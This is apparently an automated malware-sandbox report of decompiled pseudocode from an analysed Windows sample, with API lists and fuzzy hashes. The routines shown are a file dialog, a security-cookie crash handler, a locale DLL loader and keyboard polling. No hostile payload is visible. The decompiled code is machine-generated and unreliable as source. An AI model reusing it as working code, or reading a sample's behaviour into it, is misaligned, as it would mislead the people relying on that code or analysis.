                  					_t286 =  *((intOrPtr*)(_t369 + 0x74));
                  					if( *((intOrPtr*)(_t286 + 0x1c)) != _t450 ||  *((intOrPtr*)(_t286 + 0x2c)) != _t450) {
                  						_t373 = _t456 - 0x14;
                  						E00404820(_t456 - 0x14);
                  						_t288 =  *((intOrPtr*)(_t369 + 0x74));
                  						 *(_t456 - 4) = 2;
                  						_t486 =  *((intOrPtr*)(_t288 + 0x1c)) - _t450;
                  						if( *((intOrPtr*)(_t288 + 0x1c)) == _t450) {
                  							L32:
                  							_t289 =  *((intOrPtr*)(_t369 + 0x74));
                  							_t451 =  *(_t456 - 0x14);
                  							if( *((intOrPtr*)( *((intOrPtr*)(_t369 + 0x74)) + 0x2c)) == _t450) {
                  								L35:
                  								if( *((intOrPtr*)(_t451 - 0xc)) == _t450) {
                  									goto L45;
                  								} else {
                  									goto L36;
                  								}
                  							} else {
                  								if( *((intOrPtr*)(_t451 - 0xc)) != _t450) {
                  									L36:
                  									 *(_t456 - 0x1c) = _t450;
                  									if(( *0x44f74c & 0x00000001) == 0) {
                  										 *0x44f74c =  *0x44f74c | 0x00000001;
                  										_push(L"Shell32.dll");
                  										 *(_t456 - 4) = 4;
                  										 *0x44f748 = E00411FDC(_t369, _t373, _t450, _t451,  *0x44f74c);
                  										 *(_t456 - 4) = 2;
                  									}
                  									_t375 =  *0x44f748; // 0x0
                  									if((0 | _t375 != _t450) == _t450) {
                  										goto L3;
                  									} else {
                  										if(( *0x44f74c & 0x00000002) == 0) {
                  											 *0x44f74c =  *0x44f74c | 0x00000002;
                  											 *0x44f744 = GetProcAddress(_t375, "SHCreateItemFromParsingName");
                  										}
                  										_t375 =  *0x44f744; // 0x0
                  										if((0 | _t375 != _t450) == _t450) {
                  											goto L3;
                  										} else {
                  											_push(_t456 - 0x1c);
                  											_push(0x43e3c4);
                  											_push(_t450);
                  											_push(_t451);
                  											if(_t375->i() < _t450) {
                  												L45:
                  												 *(_t456 - 4) =  *(_t456 - 4) | 0xffffffff;
                  												_t174 = _t451 - 0x10; // -16
                  												E004055F0(_t174);
                  											} else {
                  												_t302 =  *(_t369 + 0x80);
                  												_t504 =  *((intOrPtr*)( *_t302 + 0x30))(_t302,  *(_t456 - 0x1c)) - _t450;
                  												_t375 = 0 | _t504 >= 0x00000000;
                  												if(_t504 >= 0 == _t450) {
                  													goto L3;
                  												} else {
                  													_t305 =  *(_t456 - 0x1c);
                  													 *((intOrPtr*)( *_t305 + 8))(_t305);
                  													goto L45;
                  												}
                  											}
                  										}
                  									}
                  								} else {
                  									_t373 = _t456 - 0x14;
                  									E00405C40(_t456 - 0x14,  *((intOrPtr*)(_t289 + 0x2c)));
                  									_t451 =  *(_t456 - 0x14);
                  									goto L35;
                  								}
                  							}
                  						} else {
                  							_push( *((intOrPtr*)(_t288 + 0x1c)));
                  							E00410F00(_t369, _t456 - 0x20, _t450, _t451, _t486);
                  							 *(_t456 - 4) = 3;
                  							E00405630(_t456 - 0x14, _t486, _t456 - 0x20);
                  							PathRemoveFileSpecW(E00412509(_t456 - 0x14));
                  							E0040E100(_t369, _t456 - 0x14, _t450, 0xffffffff);
                  							_t451 =  *( *(_t456 - 0x14) - 0xc);
                  							if(E00404DE0(_t369, _t456 - 0x20, _t450, _t451, _t451) == 0x5c) {
                  								_t451 = _t451 + 1;
                  							}
                  							_t318 =  *(_t369 + 0x80);
                  							_t489 =  *((intOrPtr*)( *_t318 + 0x3c))(_t318,  *(_t456 - 0x20) + _t451 * 2) - _t450;
                  							_t375 = 0 | _t489 >= 0x00000000;
                  							if(_t489 >= 0 == _t450) {
                  								goto L3;
                  							} else {
                  								_t373 =  *(_t456 - 0x20) + 0xfffffff0;
                  								 *(_t456 - 4) = 2;
                  								E004055F0( *(_t456 - 0x20) + 0xfffffff0);
                  								goto L32;
                  							}
                  						}
                  					}
                  					_t291 =  *(_t369 + 0x80);
                  					_push(_t456 - 0x10);
                  					 *(_t456 - 0x10) = _t450;
                  					_t375 =  *_t291;
                  					_push(_t291);
                  					if( *((intOrPtr*)( *_t291 + 0x28))() < 0) {
                  						goto L3;
                  					}
                  					_t294 =  *((intOrPtr*)(_t369 + 0x74));
                  					if(( *(_t294 + 0x34) & 0x00000200) == 0) {
                  						_t185 = _t456 - 0x10;
                  						 *_t185 =  *(_t456 - 0x10) & 0xfffffdff;
                  						__eflags =  *_t185;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000200;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00002000) == 0) {
                  						_t192 = _t456 - 0x10;
                  						 *_t192 =  *(_t456 - 0x10) & 0xffffdfff;
                  						__eflags =  *_t192;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00002000;
                  					}
                  					if(( *(_t294 + 0x34) & 0x02000000) == 0) {
                  						_t199 = _t456 - 0x10;
                  						 *_t199 =  *(_t456 - 0x10) & 0xfdffffff;
                  						__eflags =  *_t199;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x02000000;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00001000) == 0) {
                  						_t206 = _t456 - 0x10;
                  						 *_t206 =  *(_t456 - 0x10) & 0xffffefff;
                  						__eflags =  *_t206;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00001000;
                  					}
                  					if(( *(_t294 + 0x34) & 0x10000000) == 0) {
                  						_t213 = _t456 - 0x10;
                  						 *_t213 =  *(_t456 - 0x10) & 0xefffffff;
                  						__eflags =  *_t213;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x10000000;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00000008) == 0) {
                  						_t220 = _t456 - 0x10;
                  						 *_t220 =  *(_t456 - 0x10) & 0xfffffff7;
                  						__eflags =  *_t220;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000008;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00100000) == 0) {
                  						_t227 = _t456 - 0x10;
                  						 *_t227 =  *(_t456 - 0x10) & 0xffefffff;
                  						__eflags =  *_t227;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00100000;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00008000) == 0) {
                  						_t234 = _t456 - 0x10;
                  						 *_t234 =  *(_t456 - 0x10) & 0xffff7fff;
                  						__eflags =  *_t234;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00008000;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00010000) == 0) {
                  						_t241 = _t456 - 0x10;
                  						 *_t241 =  *(_t456 - 0x10) & 0xfffeffff;
                  						__eflags =  *_t241;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00010000;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00000100) == 0) {
                  						_t248 = _t456 - 0x10;
                  						 *_t248 =  *(_t456 - 0x10) & 0xfffffeff;
                  						__eflags =  *_t248;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000100;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00000002) == 0) {
                  						_t255 = _t456 - 0x10;
                  						 *_t255 =  *(_t456 - 0x10) & 0xfffffffd;
                  						__eflags =  *_t255;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000002;
                  					}
                  					if(( *(_t294 + 0x34) & 0x00000800) == 0) {
                  						_t262 = _t456 - 0x10;
                  						 *_t262 =  *(_t456 - 0x10) & 0xfffff7ff;
                  						__eflags =  *_t262;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000800;
                  					}
                  					_t375 = 0x4000;
                  					if(( *(_t294 + 0x34) & 0x00004000) == 0) {
                  						_t269 = _t456 - 0x10;
                  						 *_t269 =  *(_t456 - 0x10) & 0xffffbfff;
                  						__eflags =  *_t269;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00004000;
                  					}
                  					if(( *(_t294 + 0x54) & 0x00000001) == 0) {
                  						_t276 = _t456 - 0x10;
                  						 *_t276 =  *(_t456 - 0x10) & 0xfffbffff;
                  						__eflags =  *_t276;
                  					} else {
                  						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00040000;
                  					}
                  					_t369 =  *(_t369 + 0x80);
                  					_push( *(_t456 - 0x10));
                  					_push(_t369);
                  					if( *((intOrPtr*)( *_t369 + 0x24))() < 0) {
                  						goto L3;
                  					}
                  				}
                  				return E00429303(_t282);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00412AEA
                  • _wcslen.LIBCMT ref: 00412B86
                  • _wcslen.LIBCMT ref: 00412B90
                  • _wcslen.LIBCMT ref: 00412BF2
                  • _memcpy_s.LIBCMT ref: 00412C36
                  • _wcslen.LIBCMT ref: 00412C48
                  • _memcpy_s.LIBCMT ref: 00412C91
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                    • Part of subcall function 00410F00: __EH_prolog3.LIBCMT ref: 00410F07
                    • Part of subcall function 00410F00: _DebugHeapAllocator.LIBCPMTD ref: 00410F35
                  • PathRemoveFileSpecW.SHLWAPI(00000000), ref: 00412D89
                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00412E5F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _wcslen$H_prolog3_memcpy_s$AddressAllocatorDebugException@8FileHeapPathProcRemoveSpecThrow
                  • String ID: SHCreateItemFromParsingName$Shell32.dll
                  • API String ID: 1593954047-214508289
                  • Opcode ID: 3a871ebe44f67a8adc3c43ddc3dc3a7330ca7e448866e293d60490ee2505cd85
                  • Instruction ID: 76ce762e018b96d02787904f7ab448ee36e1499435031be9c6180e8cffc8725b
                  • Opcode Fuzzy Hash: 3a871ebe44f67a8adc3c43ddc3dc3a7330ca7e448866e293d60490ee2505cd85
                  • Instruction Fuzzy Hash: 97F1AF309002168FCB18DF64CA85AFEB7B5FF44315F14466EE411EB2E2D7B89951CB58
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 61%
                  			E0041286F(void* __ebx, intOrPtr __ecx, struct _OSVERSIONINFOW __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t87;
                  				signed int _t90;
                  				intOrPtr _t102;
                  				void* _t105;
                  				intOrPtr* _t106;
                  				intOrPtr* _t108;
                  				short* _t115;
                  				intOrPtr _t116;
                  				signed int _t120;
                  				void* _t127;
                  				short* _t128;
                  				signed char _t129;
                  				void* _t138;
                  				intOrPtr _t148;
                  				void* _t149;
                  				void* _t150;
                  				signed int _t159;
                  
                  				_t145 = __edi;
                  				_push(0x12c);
                  				E00429294(E00438BE0, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t149 - 0x130)) =  *((intOrPtr*)(_t149 + 0x10));
                  				 *((intOrPtr*)(_t149 - 0x12c)) =  *((intOrPtr*)(_t149 + 0x18));
                  				_t148 = __ecx;
                  				 *((intOrPtr*)(_t149 - 0x138)) = __ecx;
                  				E0041209C(__ecx,  *((intOrPtr*)(_t149 + 0x1c)));
                  				 *((intOrPtr*)(_t149 - 4)) = 0;
                  				 *((intOrPtr*)(__ecx)) = 0x43e234;
                  				E00404820(__ecx + 0x8c);
                  				 *((intOrPtr*)(_t148 + 0x31c)) = 0;
                  				 *((char*)(_t149 - 4)) = 1;
                  				 *((intOrPtr*)(_t148 + 0x320)) = 0;
                  				if( *((intOrPtr*)(_t149 + 0x20)) == 0) {
                  					_t145 = 0x114;
                  					E004281D0(0x114, _t149 - 0x124, 0, 0x114);
                  					_t150 = _t150 + 0xc;
                  					 *(_t149 - 0x124) = 0x114;
                  					_t120 = GetVersionExW(_t149 - 0x124);
                  					 *((intOrPtr*)(_t149 + 0x20)) = 0x58;
                  					asm("sbb eax, eax");
                  					 *(_t148 + 0x78) =  !_t120 &  *(_t149 + 0x24);
                  				}
                  				_t87 = E004282CD(0, _t138, _t145,  *((intOrPtr*)(_t149 + 0x20)));
                  				_pop(_t127);
                  				 *((intOrPtr*)(_t148 + 0x74)) = _t87;
                  				if(_t87 == 0) {
                  					_t87 = E00413D98(_t127);
                  				}
                  				E004281D0(_t145, _t87, 0,  *((intOrPtr*)(_t149 + 0x20)));
                  				_t128 = _t148 + 0x90;
                  				 *_t128 = 0;
                  				_t146 = _t148 + 0x110;
                  				 *_t146 = 0;
                  				_t90 =  *(_t149 + 8);
                  				 *(_t148 + 0x88) = _t90;
                  				asm("sbb eax, eax");
                  				 *((intOrPtr*)(_t148 + 0x54)) =  ~_t90 + 0x7005;
                  				 *((intOrPtr*)(_t148 + 0x318)) = 0;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)))) =  *((intOrPtr*)(_t149 + 0x20));
                  				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 0x1c)) = _t146;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 0x20)) = 0x104;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t149 + 0xc));
                  				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 0x24)) = _t128;
                  				_t129 = 0x40;
                  				 *( *((intOrPtr*)(_t148 + 0x74)) + 0x28) = _t129;
                  				 *( *((intOrPtr*)(_t148 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t148 + 0x74)) + 0x34) |  *(_t149 + 0x14) | 0x00080020;
                  				if(( *(_t149 + 0x14) & _t129) != 0) {
                  					_t116 =  *((intOrPtr*)(_t148 + 0x74));
                  					_t50 = _t116 + 0x34;
                  					 *_t50 =  *(_t116 + 0x34) & 0xff7fffff;
                  					_t159 =  *_t50;
                  				}
                  				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 8)) =  *((intOrPtr*)(E0042083D(0, _t146, _t148, _t159) + 0xc));
                  				_t102 =  *((intOrPtr*)(_t148 + 0x74));
                  				 *((intOrPtr*)(_t102 + 0x44)) = E004218E7;
                  				if( *((intOrPtr*)(_t149 - 0x130)) != 0) {
                  					_t102 = E0041594E(_t146, 0x104,  *((intOrPtr*)(_t149 - 0x130)), 0xffffffff);
                  				}
                  				_t161 =  *((intOrPtr*)(_t149 - 0x12c));
                  				if( *((intOrPtr*)(_t149 - 0x12c)) != 0) {
                  					_t146 = _t148 + 0x8c;
                  					E00404880(_t148 + 0x8c,  *((intOrPtr*)(_t149 - 0x12c)));
                  					_t114 = E00405860(_t148 + 0x8c, _t161, 0);
                  					while(1) {
                  						_t115 = E0042ABC5(_t114, 0x7c);
                  						if(_t115 == 0) {
                  							break;
                  						}
                  						 *_t115 = 0;
                  						_t114 = _t115 + 2;
                  						__eflags = _t115 + 2;
                  					}
                  					_t102 =  *((intOrPtr*)(_t148 + 0x74));
                  					 *((intOrPtr*)(_t102 + 0xc)) =  *((intOrPtr*)(_t148 + 0x8c));
                  				}
                  				if( *(_t148 + 0x78) == 1) {
                  					__imp__CoInitializeEx(0, 2);
                  					if(_t102 < 0) {
                  						L23:
                  						 *(_t148 + 0x78) = 0;
                  					} else {
                  						_t105 = _t149 - 0x128;
                  						_push(_t105);
                  						_push(0x43e3b4);
                  						_t146 = _t148 + 0x31c;
                  						_push(1);
                  						 *_t146 = 0x43e1e4;
                  						 *((intOrPtr*)(_t148 + 0x320)) = 0x43e214;
                  						_push(0);
                  						if( *(_t148 + 0x88) == 0) {
                  							_push(0x44b684);
                  						} else {
                  							_push(0x44b674);
                  						}
                  						__imp__CoCreateInstance();
                  						if(_t105 < 0) {
                  							goto L23;
                  						} else {
                  							_t106 =  *((intOrPtr*)(_t149 - 0x128));
                  							_t131 =  *_t106;
                  							_push(_t149 - 0x134);
                  							_push(0x43e1a8);
                  							_push(_t106);
                  							if( *((intOrPtr*)( *_t106))() < 0) {
                  								L20:
                  								E00413DD0(_t131);
                  							}
                  							_t108 =  *((intOrPtr*)(_t149 - 0x128));
                  							_t131 =  *_t108;
                  							_push(_t148 + 0x7c);
                  							_push(_t146);
                  							_push(_t108);
                  							if( *((intOrPtr*)( *_t108 + 0x1c))() < 0) {
                  								goto L20;
                  							}
                  							 *((intOrPtr*)(_t148 + 0x80)) =  *((intOrPtr*)(_t149 - 0x128));
                  							 *((intOrPtr*)(_t148 + 0x84)) =  *((intOrPtr*)(_t149 - 0x134));
                  						}
                  					}
                  				}
                  				return E00429317(0, _t146, _t148);
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00412879
                  • _memset.LIBCMT ref: 004128DA
                  • GetVersionExW.KERNEL32(?,00000000,00000000,00000001,?,?,?,000000B0,A6E2BCA1), ref: 004128EF
                  • _malloc.LIBCMT ref: 00412910
                  • _memset.LIBCMT ref: 00412927
                  • _DebugHeapAllocator.LIBCPMTD ref: 004129F8
                  • _wcschr.LIBCMT ref: 00412A12
                  • CoInitializeEx.OLE32(00000000,00000002), ref: 00412A36
                  • CoCreateInstance.OLE32(0044B684,00000000,00000001,0043E3B4,?), ref: 00412A7D
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _memset$AllocatorCreateDebugException@8H_prolog3_HeapInitializeInstanceThrowVersion_malloc_wcschr
                  • String ID: X
                  • API String ID: 746323732-3081909835
                  • Opcode ID: 9444b300148033867f344db7c6f335abf573cddf9970f066f728b2d7ebf34bbc
                  • Instruction ID: 31284df8169f4f8c3e55b0b8dab4fb794a8dde506373f00cc48f88f740e41810
                  • Opcode Fuzzy Hash: 9444b300148033867f344db7c6f335abf573cddf9970f066f728b2d7ebf34bbc
                  • Instruction Fuzzy Hash: D77168B0A00B04CFCB21DF25C980ADABBE4BF08704F10469EE99AD7351D778A990CF58
                  Uniqueness

                  Uniqueness Score: 100.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID: P,
                  • API String ID: 2102423945-1817355563
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: 365082259a86fc2c1c821ac46da880ed1dfeb2c62f8fc9b14324d83bb56d9286
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: F002383091066AEFCB19DF28C8A5BEBBB75FF14304F14026EC55687641D732AA71CB94
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 85%
                  			E00427DFF(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                  				intOrPtr _v0;
                  				void* _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _t6;
                  				intOrPtr _t11;
                  				intOrPtr _t12;
                  				intOrPtr _t13;
                  				long _t17;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				intOrPtr _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr* _t31;
                  				void* _t34;
                  
                  				_t27 = __esi;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ecx;
                  				_t21 = __ebx;
                  				_t6 = __eax;
                  				_t34 = _t22 -  *0x44c364; // 0xa6e2bca1
                  				if(_t34 == 0) {
                  					asm("repe ret");
                  				}
                  				 *0x450360 = _t6;
                  				 *0x45035c = _t22;
                  				 *0x450358 = _t25;
                  				 *0x450354 = _t21;
                  				 *0x450350 = _t27;
                  				 *0x45034c = _t26;
                  				 *0x450378 = ss;
                  				 *0x45036c = cs;
                  				 *0x450348 = ds;
                  				 *0x450344 = es;
                  				 *0x450340 = fs;
                  				 *0x45033c = gs;
                  				asm("pushfd");
                  				_pop( *0x450370);
                  				 *0x450364 =  *_t31;
                  				 *0x450368 = _v0;
                  				 *0x450374 =  &_a4;
                  				 *0x4502b0 = 0x10001;
                  				_t11 =  *0x450368; // 0x0
                  				 *0x450264 = _t11;
                  				 *0x450258 = 0xc0000409;
                  				 *0x45025c = 1;
                  				_t12 =  *0x44c364; // 0xa6e2bca1
                  				_v812 = _t12;
                  				_t13 =  *0x44c368; // 0x591d435e
                  				_v808 = _t13;
                  				 *0x4502a8 = IsDebuggerPresent();
                  				_push(1);
                  				E0043294B(_t14);
                  				SetUnhandledExceptionFilter(0);
                  				_t17 = UnhandledExceptionFilter(0x442138);
                  				if( *0x4502a8 == 0) {
                  					_push(1);
                  					E0043294B(_t17);
                  				}
                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                  			}




















                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 0042D557
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042D56C
                  • UnhandledExceptionFilter.KERNEL32(00442138), ref: 0042D577
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0042D593
                  • TerminateProcess.KERNEL32(00000000), ref: 0042D59A
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID:
                  • API String ID: 2579439406-0
                  • Opcode ID: 1fe4b2b6ebe0236570f5590f3ea759de4ff918874ed7502708fae146e0effbd6
                  • Instruction ID: b227de8c8d5a73ef715095aa9f36552a373dccc0d329dfdcd9de58e4e5fcd20a
                  • Opcode Fuzzy Hash: 1fe4b2b6ebe0236570f5590f3ea759de4ff918874ed7502708fae146e0effbd6
                  • Instruction Fuzzy Hash: 2C21CCB89113049FDB50DF69E9896543BA4BB08B16F6051BAF84886372E7B49981CF0E
                  Uniqueness

                  Uniqueness Score: 0.01%

                  C-Code - Quality: 78%
                  			E0041CEDC(void* __ecx, intOrPtr __edx, int _a4) {
                  				signed int _v8;
                  				short _v16;
                  				short _v564;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t9;
                  				struct HINSTANCE__* _t13;
                  				intOrPtr* _t20;
                  				intOrPtr _t28;
                  				intOrPtr _t29;
                  				void* _t30;
                  				intOrPtr _t36;
                  				signed int _t37;
                  				void* _t39;
                  				intOrPtr _t40;
                  				signed int _t45;
                  				void* _t46;
                  
                  				_t35 = __edx;
                  				_t31 = __ecx;
                  				_t43 = _t45;
                  				_t46 = _t45 - 0x230;
                  				_t9 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t9 ^ _t45;
                  				_t49 = _a4 - 0x800;
                  				_t39 = __ecx;
                  				_t28 = __edx;
                  				if(_a4 != 0x800) {
                  					__eflags = GetLocaleInfoW(_a4, 3,  &_v16, 4);
                  					if(__eflags == 0) {
                  						goto L10;
                  					} else {
                  						goto L4;
                  					}
                  				} else {
                  					E00402880(_t31, E0042ABEB( &_v16, 4, L"LOC"));
                  					_t46 = _t46 + 0x10;
                  					L4:
                  					_push(_t36);
                  					_t37 =  *(E00429429(_t49));
                  					 *(E00429429(_t49)) =  *_t16 & 0x00000000;
                  					_push( &_v16);
                  					_t30 = E00427E7D( &_v564, 0x112, 0x111, _t39, _t28);
                  					_t20 = E00429429(_t49);
                  					_t50 =  *_t20;
                  					if( *_t20 == 0) {
                  						 *(E00429429(__eflags)) = _t37;
                  					} else {
                  						E0040B759( *((intOrPtr*)(E00429429(_t50))));
                  					}
                  					_pop(_t36);
                  					if(_t30 == 0xffffffff || _t30 >= 0x112) {
                  						L10:
                  						_t13 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t13 = LoadLibraryW( &_v564);
                  					}
                  				}
                  				_pop(_t40);
                  				_pop(_t29);
                  				return E00427DFF(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
                  			}






















                  APIs
                  • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 0041CF23
                  • __snwprintf_s.LIBCMT ref: 0041CF55
                  • LoadLibraryW.KERNEL32(?), ref: 0041CF90
                    • Part of subcall function 00429429: __getptd_noexit.LIBCMT ref: 00429429
                  Strings
                  Similarity
                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                  • String ID: LOC
                  • API String ID: 3175857669-519433814
                  • Opcode ID: cdc62dc400be80a96002030bcc14b6db234fd3926a899c5b58919daa1989b209
                  • Instruction ID: 8ccad98ea5934d9d1ea24b306fd994588cc14a24d9f2b1c7dca44d87f0ce5f58
                  • Opcode Fuzzy Hash: cdc62dc400be80a96002030bcc14b6db234fd3926a899c5b58919daa1989b209
                  • Instruction Fuzzy Hash: 2611E471A44218AFDB14BB65EC86BEE33A9AB01318F5004ABF101A71D1DA7C9E46C66D
                  Uniqueness

                  Uniqueness Score: 1.44%

                  C-Code - Quality: 100%
                  			E00403930(void* __ebx, intOrPtr __ecx, void* __edi, void* __fp0) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				void* __esi;
                  				signed short _t38;
                  				signed int _t39;
                  				signed short _t42;
                  				intOrPtr _t44;
                  				signed int _t57;
                  				signed int _t58;
                  				void* _t61;
                  				intOrPtr _t68;
                  				signed int _t70;
                  				void* _t89;
                  				void* _t94;
                  
                  				_t94 = __fp0;
                  				_t89 = __edi;
                  				_t61 = __ebx;
                  				_v12 = __ecx;
                  				_v8 = 0;
                  				if( *((intOrPtr*)(_v12 + 0x58)) != 0) {
                  					_t38 = GetAsyncKeyState(0x10);
                  					__eflags = _t38 & 0x00008000;
                  					if((_t38 & 0x00008000) != 0) {
                  						_t57 = E00403A70();
                  						_t58 = E00403A70();
                  						_t90 = _t57 << 0x0000000f | _t58;
                  						__eflags = _t57 << 0x0000000f | _t58;
                  						E00409D50( *((intOrPtr*)(_v12 + 0x58)), _t57 << 0x0000000f | _t58, _t57 << 0x0000000f | _t58);
                  						_v8 = 1;
                  					}
                  					_t39 = GetAsyncKeyState(0x2e);
                  					__eflags = _t39 & 0x00008000;
                  					if((_t39 & 0x00008000) != 0) {
                  						E00409730( *((intOrPtr*)(_v12 + 0x58)), _t89);
                  						_v8 = 1;
                  					}
                  					_t42 = GetAsyncKeyState(0x20);
                  					__eflags = _t42 & 0x00008000;
                  					if((_t42 & 0x00008000) != 0) {
                  						E00409870( *((intOrPtr*)(_v12 + 0x58)));
                  						_v8 = 1;
                  					}
                  					__eflags = GetAsyncKeyState(0x26) & 0x00008000;
                  					if(__eflags != 0) {
                  						E004098F0(_t61,  *((intOrPtr*)(_v12 + 0x58)), _t89, _t90, __eflags);
                  						_v8 = 1;
                  					}
                  					_t44 = _v12;
                  					__eflags =  *(_t44 + 0xa1) & 0x000000ff;
                  					if(( *(_t44 + 0xa1) & 0x000000ff) == 0) {
                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x58)))) + 4))))();
                  						_v8 = 1;
                  					}
                  					_t68 = _v12;
                  					__eflags =  *(_t68 + 0xa2) & 0x000000ff;
                  					if(( *(_t68 + 0xa2) & 0x000000ff) == 0) {
                  						__eflags = _v12 + 0x5c;
                  						E0040A300(_v12 + 0x5c, _t94);
                  						_v8 = 1;
                  					}
                  					__eflags = _v8;
                  					if(_v8 != 0) {
                  						_t70 =  *(_v12 + 0x90) + 1;
                  						__eflags = _t70;
                  						 *(_v12 + 0x90) = _t70;
                  						E00409E10( *((intOrPtr*)(_v12 + 0x58)));
                  					}
                  					return _v8;
                  				}
                  				return 0;
                  			}


















                  APIs
                  • GetAsyncKeyState.USER32(00000010), ref: 00403953
                  • GetAsyncKeyState.USER32(0000002E), ref: 0040398A
                  • GetAsyncKeyState.USER32(00000020), ref: 004039AC
                  • GetAsyncKeyState.USER32(00000026), ref: 004039D1
                  Similarity
                  • API ID: AsyncState
                  • String ID:
                  • API String ID: 425341421-0
